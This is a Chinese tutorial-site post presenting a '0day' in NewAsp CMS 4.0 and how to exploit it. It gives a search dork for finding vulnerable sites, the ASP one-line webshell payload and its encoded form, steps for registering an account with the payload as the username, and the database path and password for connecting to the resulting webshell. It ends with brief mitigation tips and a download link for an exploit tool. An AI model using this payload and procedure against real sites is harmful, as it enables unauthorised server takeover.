盘绰网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

新云网站系统NewAsp CMS Version 4.0最新0day

时间:2023/8/22作者:未知来源:盘绰网教程人气:


[摘要]概述: 由于新云4.0对注册用户未过滤特殊字符, 造成黑客通过脚本编码转换将一句话木马写入数据库文件, 从而获得WEBSHELL权限。 测试: 1. 打开...

概述:

          由于新云4.0对注册用户未过滤特殊字符, 造成黑客通过脚本编码转换将一句话木马写入数据库文件, 从而获得WEBSHELL权限。

测试:

   1. 打开www.google.cn   搜索关键字:Powered By NewAsp CMS Version 4.0 或 新云问吧

   

   2. 将<%execute request("a")%> 编码转换为 ┼攠數畣整爠煥敵瑳∨≡┩愾

  

   3. 以┼攠數畣整爠煥敵瑳∨≡┩愾   为用户名注册帐户

   4. 用一句话连接端连接 目标站点url/ask/data/ask_newasp.asa ,密码为 a

   5.上传脚本大马或者执行其它操作, 这里WEBSHELL权限已经获得。

预防:

    1.严格过滤注册用户名, 限制注册用户名长度及禁止特殊符号。

    2.更改ask/data/ask_newasp.asa 路径及名称。

    3.给文件夹做权限设置, 去除公共写入权限。

附工具:

新云最新Oday利用工具 1010

下载地址:http://www.arpun.com/soft/3392.html


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

关键词:  新云网站系统NewAsp  CMS  Version  4.0最新0day





Copyright © 2012-2018 盘绰网教程(http://www.panchuo.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版